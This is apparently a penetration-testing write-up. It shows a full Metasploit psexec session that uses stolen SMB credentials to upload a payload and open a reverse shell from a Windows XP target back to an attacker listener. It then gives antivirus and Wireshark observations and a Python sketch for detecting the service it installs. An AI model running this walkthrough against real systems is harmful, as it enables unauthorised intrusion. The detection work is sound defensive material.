The following example makes use of a previously acquired set of
credentials to exploit and gain a reverse shell on the target system.
    msf > use exploit/windows/smb/psexec
    msf exploit(psexec) > set RHOST 192.168.1.100
    RHOST => 192.168.1.100
    msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
    PAYLOAD => windows/shell/reverse_tcp
    msf exploit(psexec) > set LHOST 192.168.1.5
    LHOST => 192.168.1.5
    msf exploit(psexec) > set LPORT 4444
    LPORT => 4444
    msf exploit(psexec) > set SMBUSER victim
    SMBUSER => victim
    msf exploit(psexec) > set SMBPASS s3cr3t
    SMBPASS => s3cr3t
    msf exploit(psexec) > exploit

    [*] Connecting to the server...
    [*] Started reverse handler
    [*] Authenticating as user 'victim'...
    [*] Uploading payload...
    [*] Created \hikmEeEM.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [*] Removing the service...
    [*] Closing service handle...
    [*] Deleting \hikmEeEM.exe...
    [*] Sending stage (240 bytes)
    [*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>
--------------------------------------------------------------------------------
Analysis:
The file hikmEeEM.exe is created at c:\windows\hikmEeEM.exe and deleted after the connection is established.
This file is detected by antivirus engines, as the VirusTotal report shows:
https://www.virustotal.com/file/6a1fcc88b5e1322dac078f9b07892aa31625504961f8b5063e467537f7b3eb49/analysis/1353334338/
Detection ratio: 28 / 43
You can see the returned shell by using Wireshark.
ChannelData TURN Message malformed packets:
Two packets are flagged as malformed packets by Wireshark.
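A defender-side sketch built on the artifacts in the transcript above, added here and not part of the original post: it scores service-install records (the ServiceName and ImagePath fields that Windows versions logging Event ID 7045 record) for a mixed-case random binary placed directly in the Windows directory. The function names, the threshold and the sample records are assumptions constructed for illustration.

```python
import re

# An .exe sitting directly in the Windows directory, as the post reports for
# c:\windows\hikmEeEM.exe. Binaries in subfolders such as System32 do not match.
ROOT_EXE = re.compile(r'^"?(?:%systemroot%|[a-z]:\\windows)\\([^\\"]+)\.exe\b', re.I)

def mixed_case_random(name, min_len=8):
    """Heuristic: letters only, at least min_len long, and two or more
    lower-to-upper switches (hikmEeEM has two, WinDefend has one)."""
    if not name.isalpha() or len(name) < min_len:
        return False
    switches = sum(1 for a, b in zip(name, name[1:]) if a.islower() and b.isupper())
    return switches >= 2

def score_service_install(event):
    """Return (score, reasons) for one service-install record."""
    reasons = []
    match = ROOT_EXE.match(event.get("ImagePath", ""))
    if match:
        reasons.append("binary directly in Windows directory")
        if mixed_case_random(match.group(1)):
            reasons.append("random-looking binary name")
    if mixed_case_random(event.get("ServiceName", "")):
        reasons.append("random-looking service name")
    return len(reasons), reasons

def suspicious(events, threshold=2):
    """Service names of records whose score reaches the (assumed) threshold."""
    return [e["ServiceName"] for e in events
            if score_service_install(e)[0] >= threshold]

# Constructed sample records. The first reuses the names from the transcript;
# AcmeAgent is a hypothetical vendor service.
SAMPLE_EVENTS = [
    {"ServiceName": "ciWyCVEp", "ImagePath": r"%SystemRoot%\hikmEeEM.exe"},
    {"ServiceName": "WinDefend",
     "ImagePath": r'"C:\Program Files\Windows Defender\MsMpEng.exe"'},
    {"ServiceName": "AcmeAgent", "ImagePath": r"C:\Windows\acmeagent.exe"},
    {"ServiceName": "Dhcp",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k LocalService"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["ServiceName"], *score_service_install(ev))
    print("flagged:", suspicious(SAMPLE_EVENTS))
```

Because the transcript shows the service and the executable being removed right after the session opens, the install record may be the only trace left on disk, so it is worth forwarding off-host.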